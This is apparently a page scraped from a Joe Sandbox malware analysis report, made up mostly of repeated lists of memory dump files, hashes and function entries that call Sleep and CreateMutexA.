Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ddda051058c6ac4edd247df9806fddb94976ae8e4afebb3c98154d6cdbba6706
Instruction ID: bb264a8593cc9f4bb8dc0b5712a7d7969ccbdb679e04f5440a883cdb25aefdc9
Opcode Fuzzy Hash: ddda051058c6ac4edd247df9806fddb94976ae8e4afebb3c98154d6cdbba6706
Instruction Fuzzy Hash: 0F314A31A102209BEB08DB78EDC975DF7E3EBC6314F204699E018AB3D5C77699808712

Function 00B2A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00B2A963
CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5aad65a03c1b811d8bd812fd4f227dd4d49695d669f2f439a2d399ba26f3fbcb
Instruction ID: d41ffcae412d42eed723fe0ad8808c19c8b62831d18dcf6832759c265077474e
Opcode Fuzzy Hash: 5aad65a03c1b811d8bd812fd4f227dd4d49695d669f2f439a2d399ba26f3fbcb
Instruction Fuzzy Hash: C5311831A00210DBEB08AB68ED8975DF7E2EBC6310F244699E118AB3D5D77699C08752

Function 00B2A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00B2A963
CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 6958aae3fd7a2313b2745693df98f81000b6398726f54c96fe7f7dc672990167
Instruction ID: 9ef5ce3c53aafc7e43df9af07594d48d477729c0a91788a275d3e043f9123fd4
Opcode Fuzzy Hash: 6958aae3fd7a2313b2745693df98f81000b6398726f54c96fe7f7dc672990167
Instruction Fuzzy Hash: 8A312A31A001109BEB08BB7CED8976DB7E2EFC5314F304299E4289B3D5DBB599C08752

Function 00B2A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00B2A963
CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: d4a8df4d8a8e45e179e56f9d569b8a78664ae357d426b2980de04fa4669c1c82
Instruction ID: 7d8b61a715340e5f370c2d2e34476e3db1d0d163907d17e0782c82b789e2ca67
Opcode Fuzzy Hash: d4a8df4d8a8e45e179e56f9d569b8a78664ae357d426b2980de04fa4669c1c82
Instruction Fuzzy Hash: 70314A31A001109BEB08EB78EDC976DF7E2EBC6714F344299E5189B3D5CB7599818712

Function 00B2A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00B2A963
CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: e4be515eadd56a5ea0987bc8683352c0937c25d66836ce73f4a0ecee83fb6d74
Instruction ID: 5c007b851e597bf217a716abf0c5a5c1994a93024e6338eb9497721a169c4f55
Opcode Fuzzy Hash: e4be515eadd56a5ea0987bc8683352c0937c25d66836ce73f4a0ecee83fb6d74
Instruction Fuzzy Hash: 213128316002109BEB08DB78EDC976DB7F2EBC5314F248699E1189B3E5CB7599808756

Function 00B29ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00B2A963
CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
